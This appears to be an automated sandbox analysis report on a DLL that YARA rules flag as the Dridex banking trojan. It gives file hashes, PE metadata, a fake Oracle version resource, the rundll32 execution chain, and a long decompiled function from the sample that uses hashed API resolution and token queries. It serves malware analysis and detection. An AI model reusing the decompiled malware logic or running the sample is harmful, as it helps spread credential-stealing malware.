Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1309205" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFBAC.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Dec 22 18:54:35 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	45318
Entropy (8bit):	2.087218089488285
Encrypted:	false
SSDEEP:	192:WKn2VOoGrEUO5SkbP/6/t76iT7ZkY3LNW2LF5moq9GROmn/Q:1Eb5Lb3ct7B3L8+moq9hm4
MD5:	737B25B0873C806BB6C34D91BE9432AF
SHA1:	471A4B9D2377B4DB04453A80E38192C804A5CCF6
SHA-256:	DC2B165579D954E84569AC2E30FD3FDE74A4D07977DB271FCDC28308BAE1353E
SHA-512:	FF6304346D63073B4F632D3322375290C6E2023C2CA9B0061048883530EA273C117D134B45A6CA116016F8AACFE334D28B64A2D10D6F27DD99FA6F333A51EFCC
Malicious:	false
Reputation:	low
Preview:	MDMP....... .......kt.a.........................................-..........T.......8...........T...........@...............................................................................................U...........B...... .......GenuineIntelW...........T.......4...ct.a.............................0..=...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.240963014443897
Encrypted:	false
SSDEEP:	12288:bMYPkiYTIKIYBJkrFJ9gbjHEaB0T7ciu3khohXv7Guth6GUA:IYPkiYTIKI6JkrGEa
MD5:	0EADA9EBBD286DA189D4B015940BD378
SHA1:	4D9A01E1192B39A07F8DA8B338AF68D0DA725010
SHA-256:	248D3E467BBA722FDC2ECE9987DC37A5A2657FC1364D101E25DC6CBA93F73F90
SHA-512:	56C3296CDC6404F8905439D5819459BB822F7966FAEB1C50FE8F6BD85C04213DEB7636AF67D9293C1BFF809CF3BFA256E67E96766AD542088E2F4364EBBF82FF
Malicious:	false
Reputation:	low
Preview:	regfH...H...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmn..Ze...............................................................................................................................................................................................................................................................................................................................................K...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1 Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	3.4085791700922217
Encrypted:	false
SSDEEP:	384:Yjd5K5LPv4EgnVVeeDze81NKZtjkT8GpwTO1Q33SYc:IDKDg/eeDzeyNYtjlGpwTOMSY
MD5:	7C0E7163ED27F991179C4C5C35D657E4
SHA1:	7C8F46EA90EB016A6E4ADCC501B5E8F7906ED736
SHA-256:	BC07E124D412271322C3CD7F16D1763BE78AE2540A39087797B89338D79AC046
SHA-512:	56B9D194D039F369E3081EC8E9FB572B9715DB466E85BDCCE9DAD404E8BFFD3238B751D5B721AA7ED198F546C759EC1F6CCE7890F86AF6D448B48BF0EC0804E1
Malicious:	false
Reputation:	low
Preview:	regfG...G...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmn..Ze...............................................................................................................................................................................................................................................................................................................................................M...HvLE.N......G............[\V.-.;D.R%........................ ..hbin................p.\..,..........nk,....Ze................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ....Ze....... ........................... .......Z.......................Root........lf......Root....nk ....Ze................................... ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p...

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.322458028777742
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll
File size:	544768
MD5:	57cc0ec93c55348dd7b864e26ec96379
SHA1:	bcf46bb64fc5a673e7889d9ba9baad26bfab0ff7
SHA256:	60bd3eba4dac7d37cd07e375f4dbfe5e816b0ab599f28da31c5cf5b180b5849a
SHA512:	562b44d23cbfa0ccec2bee34dfd5cdbad64f87adc8b152c2874d9a4f5b249ff7dfa437aa150fe33e919b3aa3871bf8b92dcbc8cc11b47aed69e791e1d4a9a784
SSDEEP:	6144:D7+RYf/Mv1UvT4vjYf/Glpov3KvfMvLo+jwHk3UryzU3+R7ff4evm35IQku4+pMQ:D7t2UAogoOwhx7nA4+pMXg
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R...<...<...<..k....<...=.S.<.=.....<.......<.......<.t.?...<.t.=.4.<.L.9...<.t...0.<..k....<..0..x.<.......<..1....<..k....<

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10004db0
Entrypoint Section:	.rdata
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61C2E245 [Wed Dec 22 08:31:01 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	e980d287af7ef0ccd616c6efb9daaae8

Entrypoint Preview

Instruction
inc eax
mov edx, 00000003h
cmpps xmm1, xmm0, 02h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
jmp 00007F61ECC842C1h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push edi
push ebx
and esp, FFFFFFF8h
sub esp, 00000090h
mov eax, dword ptr [ebp+08h]
mov byte ptr [esp+00000083h], 00000064h
mov dword ptr [esp+70h], 02263442h
mov dword ptr [esp+44h], eax
call 00007F61ECC87E4Ah
mov ecx, eax
mov edx, eax
mov esi, dword ptr [eax+3Ch]
movzx edi, word ptr [esp+0000008Ah]
mov bx, di
mov dword ptr [esp+40h], eax
mov eax, edi
xor eax, 0000E2E7h
mov word ptr [esp+3Eh], ax
mov al, byte ptr [esp+77h]
mov byte ptr [esp+3Dh], al
mov eax, dword ptr [esp+00000084h]
mov dword ptr [esp+38h], esi
mov si, word ptr [esp+3Eh]
mov word ptr [eax+eax+00000000h], si

Rich Headers

Programming Language:

[IMP] VS2015 UPD1 build 23506
[C++] VS2012 UPD1 build 51106
[ASM] VS2012 build 50727
[ASM] VS2012 UPD2 build 60315
[LNK] VS2010 SP1 build 40219
[EXP] VS2010 SP1 build 40219
[RES] VS2015 UPD1 build 23506
[IMP] VS2010 build 30319
[ASM] VS2015 UPD1 build 23506
[C++] VS2017 v15.5.4 build 25834
[EXP] VS2012 UPD4 build 61030
[C++] VS2008 build 21022
[ASM] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x7c029	0x60	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7c08c	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x84000	0x2f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x85000	0x1138	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x6030	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x44	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.rdata	0x1000	0x6b2e	0x7000	False	0.391636439732	data	4.47964770197	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x7424e	0x75000	False	0.316228882879	data	7.44062687646	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x7d000	0x66d8	0x5000	False	0.24609375	data	5.03782298504	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x84000	0x2f0	0x1000	False	0.09033203125	data	0.789164600932	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x85000	0x1138	0x2000	False	0.2421875	data	4.12390144992	IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x84060	0x290	MS Windows COFF PA-RISC object file	English	United States

Imports

DLL	Import
WINSPOOL.DRV	EnumFormsW
ADVAPI32.dll	RegCloseKey, QueryServiceStatusEx, AccessCheck
WS2_32.dll	WSACleanup
USER32.dll	GetWindowTextA
KERNEL32.dll	CloseHandle, GetModuleHandleW, GetFileSize, OutputDebugStringA, IsDebuggerPresent, GetModuleFileNameW

Version Infos

Description	Data
OriginalFilename	Iha.dll
FileDescription	Oracle Call Interface
FileVersion	2.3.7.0.0
Legal Copyright	Copyright Oracle Corporation 1979, 2001. All rights reserved.
CompanyName	Oracle Corporation
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 1172 Parent PID: 1496

General

Start time:	19:54:26
Start date:	22/12/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.4295.dll"
Imagebase:	0x910000
File size:	116736 bytes
MD5 hash:	7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000002.1192296113.000000006E7C1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 5352 Parent PID: 1172

General

Start time:	19:54:27
Start date:	22/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.4295.dll",#1
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6452 Parent PID: 5352

General

Start time:	19:54:27
Start date:	22/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.4295.dll",#1
Imagebase:	0xcf0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000002.711138544.000000006E7C1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000000.675076733.000000006E7C1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000000.673891471.000000006E7C1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 6540 Parent PID: 6452

General

Start time:	19:54:30
Start date:	22/12/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6452 -s 684
Imagebase:	0x11a0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 1172 Parent PID: 1496 loaddll32.exeCOMMON

Executed Functions

Function 6E7D0730, Relevance: 5.2, APIs: 3, Instructions: 650
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E6E7D0730(void* __ecx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t155;
				signed char* _t159;
				char _t162;
				void* _t180;
				intOrPtr _t189;
				char _t190;
				intOrPtr _t196;
				intOrPtr _t200;
				void* _t203;
				void* _t212;
				void* _t213;
				void* _t215;
				void* _t216;
				void* _t223;
				void* _t238;
				void* _t241;
				void* _t244;
				void* _t247;
				void* _t250;
				void* _t254;
				void* _t259;
				void* _t265;
				void* _t268;
				int _t271;
				void* _t272;
				void* _t276;
				void* _t277;
				void* _t278;
				void* _t282;
				int _t288;
				intOrPtr* _t291;
				signed char _t294;
				signed char _t295;
				intOrPtr* _t320;
				intOrPtr* _t325;
				intOrPtr* _t363;
				char _t364;
				intOrPtr* _t372;
				void* _t377;
				void* _t382;
				void* _t383;
				void* _t384;
				void* _t385;
				void* _t386;
				void* _t387;
				void* _t393;
				void* _t395;
				void* _t401;
				void* _t403;
				intOrPtr* _t404;
				signed int _t406;
				intOrPtr* _t409;
				void* _t411;
				signed int _t413;
				void* _t414;
				void* _t415;
				void* _t420;
				intOrPtr* _t423;
				void* _t425;
				void** _t427;
				void* _t428;
				void* _t429;

				_t414 = __ecx;
				_t155 =  *0x6e7dd1f8;
				if(_t155 == 0x4c71e88d) {
					_t155 = E6E7D361C(0x30);
					 *0x6e7dd1f8 = _t155;
				}
				if( *((char*)(_t155 + 0xb)) == 0 || _t414 != 0) {
					_t415 = _t428 + 0x48;
					E6E7D3698(_t415, 0, 0x11c);
					_t429 = _t428 + 0xc;
					 *((intOrPtr*)(_t429 + 0x48)) = 0x11c;
					if(E6E7D306C(0x8e844d1e, 0xcf311107, 0x8e844d1e, 0x8e844d1e) != 0) {
						_push(_t415);
						asm("int3");
						asm("int3");
					}
					_t404 =  *0x6e7dd1f8;
					_t159 = _t429 + 0x4c;
					_t294 =  *_t159;
					 *(_t404 + 8) = _t294;
					_t295 = _t159[4];
					 *(_t404 + 9) = _t295;
					 *((char*)(_t404 + 0xa)) = _t159[0x110];
					 *((intOrPtr*)(_t404 + 4)) =  *((intOrPtr*)(_t429 + 0x54));
					 *((char*)(_t404 + 0xc)) = 0 | _t159[0x116] != 0x00000001;
					 *_t404 = (_t295 & 0x000000ff) + ((_t294 & 0x000000ff) << 4) - 0x50;
					_t162 = E6E7D0FF8(_t404);
					 *(_t429 + 0x198) = 0;
					 *((char*)( *0x6e7dd1f8 + 0xb)) = _t162;
					_t363 = E6E7D306C(0x150c05fc, 0x1da4d409, _t162, _t162);
					if(_t363 == 0) {
						L12:
						_t364 = 0;
						L13:
						 *((char*)( *0x6e7dd1f8 + 0x28)) = _t364;
						if( *((intOrPtr*)(E6E7D0730(0))) >= 0x10) {
							_push(6);
							memcpy(_t429 + 0x164, 0x6e7dbce0, 0 << 2);
							_t429 = _t429 + 0xc;
							 *((intOrPtr*)(_t429 + 0x1c)) = 0;
							E6E7CF584(_t429 + 0x24, 0);
							_t406 = 0;
							__eflags = 0;
							do {
								E6E7CF828(_t429 + 0x24, E6E7CF4CC(_t429 + 0x20) + 4);
								 *((intOrPtr*)(E6E7CF4BC(_t429 + 0x24, E6E7CF4CC(_t429 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t429 + 0x164 + _t406 * 4));
								_t406 = _t406 + 1;
								 *((intOrPtr*)(_t429 + 0x1c)) =  *((intOrPtr*)(_t429 + 0x1c)) + 1;
								__eflags = _t406 - 6;
							} while (_t406 < 6);
							_push(0);
							E6E7D5580(_t429 + 0xc, _t429 + 0x1c, 0x80000002);
							E6E7CF654(_t429 + 0x20);
							E6E7D55B0(_t429 + 8, _t429 + 0x1c0, 0xc0092a94);
							_t180 = E6E7D5864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c0)));
							_t407 = _t180;
							E6E7CDFA4(_t429 + 0x1c0);
							__eflags = _t180;
							if(_t180 != 0) {
								E6E7D55B0(_t429 + 8, _t429 + 0x1c8, 0x1e55aaec);
								_t420 = E6E7D5864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c8)));
								E6E7CDFA4(_t429 + 0x1c8);
								_t407 = _t429 + 0x1d0;
								E6E7D55B0(_t429 + 8, _t429 + 0x1d0, 0x360d0c74);
								_t401 = E6E7D5864(_t429 + 4, __eflags,  *(_t429 + 0x1d0));
								E6E7CDFA4(_t429 + 0x1d0);
								__eflags = _t420;
								if(_t420 != 0) {
									__eflags = _t420 - 5;
									if(_t420 != 5) {
										__eflags = _t420 - 2;
										if(_t420 != 2) {
											L58:
											E6E7CCFDC(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L65:
												_t189 = 0;
												__eflags = 0;
												 *(_t429 + 4) = 0;
												goto L66;
											}
											_t382 =  *(_t429 + 4);
											__eflags = _t382;
											if(_t382 == 0) {
												L61:
												_t238 = 1;
												L63:
												__eflags = _t238;
												if(_t238 == 0) {
													E6E7D5558(_t382);
												}
												goto L65;
											}
											__eflags = _t382 - 0xffffffff;
											if(_t382 != 0xffffffff) {
												_t238 = 0;
												__eflags = 0;
												goto L63;
											}
											goto L61;
										}
										__eflags = _t401 - 1;
										if(_t401 != 1) {
											goto L58;
										}
										E6E7CCFDC(_t429 + 0xc);
										__eflags =  *((char*)(_t429 + 8));
										if( *((char*)(_t429 + 8)) == 0) {
											L57:
											 *(_t429 + 4) = 0;
											_t189 = 5;
											goto L66;
										}
										_t383 =  *(_t429 + 4);
										__eflags = _t383;
										if(_t383 == 0) {
											L53:
											_t241 = 1;
											L55:
											__eflags = _t241;
											if(_t241 == 0) {
												E6E7D5558(_t383);
											}
											goto L57;
										}
										__eflags = _t383 - 0xffffffff;
										if(_t383 != 0xffffffff) {
											_t241 = 0;
											__eflags = 0;
											goto L55;
										}
										goto L53;
									}
									__eflags = _t401;
									if(_t401 != 0) {
										__eflags = _t401 - 1;
										if(_t401 == 1) {
											E6E7CCFDC(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L121:
												 *(_t429 + 4) = 0;
												_t189 = 4;
												goto L66;
											}
											_t384 =  *(_t429 + 4);
											__eflags = _t384;
											if(_t384 == 0) {
												L117:
												_t244 = 1;
												L119:
												__eflags = _t244;
												if(_t244 == 0) {
													E6E7D5558(_t384);
												}
												goto L121;
											}
											__eflags = _t384 - 0xffffffff;
											if(_t384 != 0xffffffff) {
												_t244 = 0;
												__eflags = 0;
												goto L119;
											}
											goto L117;
										}
										goto L58;
									}
									E6E7CCFDC(_t429 + 0xc);
									__eflags =  *((char*)(_t429 + 8));
									if( *((char*)(_t429 + 8)) == 0) {
										L45:
										 *(_t429 + 4) = 0;
										_t189 = 3;
										goto L66;
									}
									_t385 =  *(_t429 + 4);
									__eflags = _t385;
									if(_t385 == 0) {
										L41:
										_t247 = 1;
										L43:
										__eflags = _t247;
										if(_t247 == 0) {
											E6E7D5558(_t385);
										}
										goto L45;
									}
									__eflags = _t385 - 0xffffffff;
									if(_t385 != 0xffffffff) {
										_t247 = 0;
										__eflags = 0;
										goto L43;
									}
									goto L41;
								}
								__eflags = _t401;
								if(_t401 != 0) {
									goto L58;
								}
								E6E7CCFDC(_t429 + 0xc);
								__eflags =  *((char*)(_t429 + 8));
								if( *((char*)(_t429 + 8)) == 0) {
									L35:
									 *(_t429 + 4) = 0;
									_t189 = 2;
									goto L66;
								}
								_t386 =  *(_t429 + 4);
								__eflags = _t386;
								if(_t386 == 0) {
									L31:
									_t250 = 1;
									L33:
									__eflags = _t250;
									if(_t250 == 0) {
										E6E7D5558(_t386);
									}
									goto L35;
								}
								__eflags = _t386 - 0xffffffff;
								if(_t386 != 0xffffffff) {
									_t250 = 0;
									__eflags = 0;
									goto L33;
								}
								goto L31;
							}
							E6E7CCFDC(_t429 + 0xc);
							__eflags =  *((char*)(_t429 + 8));
							if( *((char*)(_t429 + 8)) == 0) {
								L25:
								 *(_t429 + 4) = 0;
								_t189 = 1;
								goto L66;
							}
							_t387 =  *(_t429 + 4);
							__eflags = _t387;
							if(_t387 == 0) {
								L21:
								_t254 = 1;
								L23:
								__eflags = _t254;
								if(_t254 == 0) {
									E6E7D5558(_t387);
								}
								goto L25;
							}
							__eflags = _t387 - 0xffffffff;
							if(_t387 != 0xffffffff) {
								_t254 = 0;
								__eflags = 0;
								goto L23;
							}
							goto L21;
						} else {
							_t189 = 1;
							L66:
							 *((intOrPtr*)( *0x6e7dd1f8 + 0x24)) = _t189;
							_t190 = E6E7D1030(0xffffffffffffffff);
							_t320 =  *0x6e7dd1f8;
							 *((char*)(_t320 + 0x29)) = _t190;
							 *((intOrPtr*)(_t320 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
							if( *_t320 >= 0x10) {
								__eflags = 0xffffffffffffffff;
								 *((intOrPtr*)( *0x6e7dd1f8 + 0x2c)) = E6E7D10A4(0x6e7dd1f8, 0xffffffffffffffff);
								L78:
								if(E6E7D306C(0x8e844d1e, 0x925d7fea, 0x8e844d1e, 0x8e844d1e) != 0) {
									GetSystemInfo(_t429 + 0x164); // executed
								}
								_t196 =  *0x6e7dd1f8;
								_t291 = _t429 + 0x178;
								_t409 = _t429 + 0x170;
								 *((short*)(_t196 + 0xe)) =  *_t291;
								 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t291 - 0x10));
								 *((intOrPtr*)(_t196 + 0x14)) =  *((intOrPtr*)(_t291 - 0xc));
								 *((intOrPtr*)(_t196 + 0x18)) =  *_t409;
								 *((intOrPtr*)(_t196 + 0x1c)) =  *((intOrPtr*)(_t409 + 0x10));
								return _t196;
							}
							 *(_t429 + 0x19c) = 0;
							_t372 = E6E7D306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
							if(_t372 == 0) {
								L74:
								_t200 =  *0x6e7dd1f8;
								if( *((char*)(_t200 + 0x28)) == 0) {
									 *((intOrPtr*)(_t200 + 0x2c)) = 3;
								} else {
									 *((intOrPtr*)(_t200 + 0x2c)) = 5;
								}
								goto L78;
							}
							_push(_t429 + 0x19c);
							_push(8);
							_push(0xffffffff);
							if( *_t372() == 0) {
								_t203 = E6E7D35F0(_t407);
								__eflags = _t203;
								if(_t203 != 0) {
									goto L74;
								}
							}
							 *(_t429 + 0x30) =  *(_t429 + 0x19c);
							 *((char*)(_t429 + 0x34)) = 1;
							 *(_t429 + 0x1a4) = 0;
							_t325 = E6E7D306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
							if(_t325 != 0) {
								_push(_t429 + 0x1a4);
								_push(0);
								_push(0);
								_push(1);
								_push( *(_t429 + 0x1ac));
								if( *_t325() == 0) {
									E6E7D35F0(_t407);
								}
							}
							_t206 =  *(_t429 + 0x1a4);
							if( *(_t429 + 0x1a4) != 0) {
								E6E7CF584(_t429 + 0x18c, _t206);
								_t411 = E6E7D306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
								__eflags = _t411;
								if(_t411 == 0) {
									L133:
									E6E7CF654(_t429 + 0x188);
									goto L72;
								}
								_t212 = E6E7CF4BC(_t429 + 0x18c, 0);
								_t213 = E6E7CF4CC(_t429 + 0x188);
								_t215 =  *_t411( *(_t429 + 0x1ac), 1, _t212, _t213, _t429 + 0x1a4);
								__eflags = _t215;
								if(_t215 == 0) {
									_t216 = E6E7D35F0(_t411);
									__eflags = _t216;
									if(_t216 != 0) {
										goto L133;
									}
								}
								_t423 = E6E7CF4BC(_t429 + 0x18c, 0);
								E6E7CDF4C(_t429 + 0x1b4, 0);
								 *(_t429 + 0x1ac) = 0;
								_t377 = E6E7D306C(0x150c05fc, 0xfc1a24a1, 0x150c05fc, 0x150c05fc);
								__eflags = _t377;
								if(_t377 != 0) {
									 *_t377( *_t423, _t429 + 0x1ac);
								}
								E6E7CDFC0(_t429 + 0x1b4,  *(_t429 + 0x1ac));
								_t223 = E6E7D306C(0x8e844d1e, 0xda6a2597, 0x8e844d1e, 0x8e844d1e);
								__eflags = _t223;
								if(_t223 != 0) {
									_push( *(_t429 + 0x1ac));
									asm("int3");
									asm("int3");
								}
								E6E7CE06C(_t429 + 0x1b8 - 8, _t429 + 0x1b8);
								_t425 = E6E7D4FFC( *((intOrPtr*)(_t429 + 0x1b8)), E6E7CE8A8( *((intOrPtr*)(_t429 + 0x1b8)), 0x7fffffff));
								E6E7CDFA4(_t429 + 0x1b8);
								E6E7CDFA4(_t429 + 0x1b0);
								E6E7CF654(_t429 + 0x188);
								__eflags =  *((char*)(_t429 + 0x34));
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6E7CBB44(_t429 + 0x30);
								}
								__eflags = _t425 - 0x6df4cf7;
								if(_t425 != 0x6df4cf7) {
									goto L74;
								} else {
									 *((intOrPtr*)( *0x6e7dd1f8 + 0x2c)) = 6;
									goto L78;
								}
							} else {
								L72:
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6E7CBB44(_t429 + 0x30);
								}
								goto L74;
							}
						}
					}
					_push(_t429 + 0x198);
					_push(8);
					_push(0xffffffff);
					if( *_t363() == 0) {
						_t259 = E6E7D35F0(_t404);
						__eflags = _t259;
						if(_t259 != 0) {
							goto L12;
						}
					}
					 *(_t429 + 0x14) =  *(_t429 + 0x198);
					 *((char*)(_t429 + 0x18)) = 1;
					 *(_t429 + 0x1a0) = 0;
					if(E6E7D306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
						_t288 = GetTokenInformation( *(_t429 + 0x1a8), 2, 0, 0, _t429 + 0x1a0); // executed
						if(_t288 == 0) {
							E6E7D35F0(_t404);
						}
					}
					_t262 =  *(_t429 + 0x1a0);
					if( *(_t429 + 0x1a0) != 0) {
						E6E7CF584(_t429 + 0x3c, _t262);
						_t265 = E6E7D306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
						_t407 = _t265;
						__eflags = _t265;
						if(_t265 == 0) {
							L107:
							E6E7CF654(_t429 + 0x38);
							goto L10;
						}
						_t268 = E6E7CF4BC(_t429 + 0x3c, 0);
						_t271 = GetTokenInformation( *(_t429 + 0x1a8), 2, _t268, E6E7CF4CC(_t429 + 0x38), _t429 + 0x1a0); // executed
						__eflags = _t271;
						if(_t271 == 0) {
							_t272 = E6E7D35F0(_t407);
							__eflags = _t272;
							if(_t272 != 0) {
								goto L107;
							}
						}
						_t427 = E6E7CF4BC(_t429 + 0x3c, 0);
						 *(_t429 + 0x1d8 - 0x30) = 0;
						asm("movsd");
						asm("movsb");
						asm("movsb");
						_t407 = E6E7D306C(0x150c05fc, 0x2351aaca, 0x150c05fc, 0x150c05fc);
